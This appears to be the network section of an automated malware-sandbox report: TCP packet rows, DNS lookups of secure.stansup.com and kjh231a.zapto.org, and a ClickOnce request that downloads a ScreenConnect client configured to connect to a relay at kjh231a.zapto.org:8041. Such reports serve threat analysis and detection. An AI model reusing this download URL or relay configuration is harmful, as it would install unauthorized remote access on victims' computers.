                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:48.813256979 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:48.813291073 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:48.813302994 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:48.935106039 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:48.935129881 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:48.935213089 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:48.935224056 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:48.935272932 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.063802004 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.063826084 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.063952923 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.063975096 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.064037085 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.099098921 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.099122047 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.099245071 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.099261045 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.099306107 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.188417912 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.188437939 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.188572884 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.188601017 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.188647032 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.311647892 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.311669111 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.311719894 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.311738014 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.311750889 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.313926935 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.394987106 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.395011902 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.395078897 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.395093918 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.395136118 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.438600063 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.438618898 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.438760996 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.438782930 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.438836098 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.561583042 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.561604023 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.561861038 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.561887980 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.561953068 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.561985016 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.595335007 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.595354080 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.595484972 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.595504999 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.595552921 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.686342001 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.686363935 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.686492920 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.686518908 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.686583042 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.766525030 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.766546011 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.766640902 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.766666889 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.766722918 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.810183048 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.810201883 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.810329914 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.810344934 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.810403109 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.928188086 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.928225994 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.928277969 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.928302050 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.928328037 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.928354979 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.934680939 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.934696913 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.934751987 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.934758902 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.934786081 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:49.934802055 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.064713001 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.064733028 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.064805031 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.064819098 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.064831972 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.064856052 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.066222906 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.066241026 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.066319942 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.066328049 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.066390991 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.176250935 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.176274061 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.176350117 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.176367044 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.176577091 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.189476013 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.189496994 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.189680099 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.189697981 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.189750910 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.300297022 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.300317049 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.300425053 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.300448895 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.300498009 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.313613892 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.313641071 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.313747883 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.313756943 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.313807964 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.339423895 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.339447975 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.339550018 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.339565992 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.339618921 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.670893908 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.670938015 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.670991898 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.671011925 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.671024084 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.671027899 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.671067953 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.671073914 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.671101093 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.671132088 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.671138048 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.671163082 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.671176910 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.672600031 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.672646046 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.672700882 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.672707081 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.672743082 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.672760963 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.677719116 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.677769899 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.677831888 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.677839041 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.677870035 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.677882910 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.678936958 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.678982019 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.679019928 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.679027081 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.679064035 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.679079056 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.684961081 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.685005903 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.685029030 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.685034037 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.685065031 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.685079098 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.685846090 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.685903072 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.686001062 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.686006069 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.686053038 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.808476925 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.808530092 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.808602095 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.808615923 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.808655024 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.808675051 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.809462070 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.809511900 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.809541941 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.809546947 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.809571028 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.809591055 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.834660053 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.834692955 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.834836006 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.834845066 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.834902048 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.932583094 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.932643890 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.932729959 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.932744980 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.932758093 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.932786942 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.933315039 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.933357954 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.933391094 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.933397055 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.933427095 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.933444977 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.934087992 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.934171915 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.934185982 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.934245110 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.934257030 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.934340000 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.935024977 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.935034037 CEST4434973079.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.935065985 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:50.935094118 CEST49730443192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:54.218105078 CEST497328041192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:54.223649025 CEST80414973279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:54.223762989 CEST497328041192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:55.416069031 CEST497328041192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:55.421504974 CEST80414973279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:55.654887915 CEST80414973279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:55.693841934 CEST497328041192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:55.699537039 CEST80414973279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:55.937495947 CEST80414973279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:56.028969049 CEST497328041192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:57.854312897 CEST497328041192.168.2.1079.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:57.860429049 CEST80414973279.110.49.185192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:57.860543013 CEST497328041192.168.2.1079.110.49.185

                                                                                                                                                                                                                                                      UDP Packets

                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:16.235219002 CEST5743553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:16.260771036 CEST53574351.1.1.1192.168.2.10
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:54.173686028 CEST6251853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:54.183593988 CEST53625181.1.1.1192.168.2.10

                                                                                                                                                                                                                                                      DNS Queries

                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:16.235219002 CEST192.168.2.101.1.1.10xecabStandard query (0)secure.stansup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:54.173686028 CEST192.168.2.101.1.1.10xce7bStandard query (0)kjh231a.zapto.orgA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:16.260771036 CEST1.1.1.1192.168.2.100xecabNo error (0)secure.stansup.com79.110.49.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:18.778695107 CEST1.1.1.1192.168.2.100xe6d4No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:18.778695107 CEST1.1.1.1192.168.2.100xe6d4No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:18.778695107 CEST1.1.1.1192.168.2.100xe6d4No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:18.778695107 CEST1.1.1.1192.168.2.100xe6d4No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:18.778695107 CEST1.1.1.1192.168.2.100xe6d4No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:18.778695107 CEST1.1.1.1192.168.2.100xe6d4No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:18.778695107 CEST1.1.1.1192.168.2.100xe6d4No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:18.778695107 CEST1.1.1.1192.168.2.100xe6d4No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:20.369189024 CEST1.1.1.1192.168.2.100x5cccNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:20.369189024 CEST1.1.1.1192.168.2.100x5cccNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:22.930172920 CEST1.1.1.1192.168.2.100x1be7No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:22.930172920 CEST1.1.1.1192.168.2.100x1be7No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Oct 25, 2024 19:27:54.183593988 CEST1.1.1.1192.168.2.100xce7bNo error (0)kjh231a.zapto.org79.110.49.185A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                                                                                                      • secure.stansup.com

                                                                                                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      0192.168.2.104970279.110.49.1854437740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-10-25 17:27:17 UTC631OUTGET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=%2f&i=Untitled%20Session HTTP/1.1
                                                                                                                                                                                                                                                      Host: secure.stansup.com
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      2024-10-25 17:27:17 UTC250INHTTP/1.1 200 OK
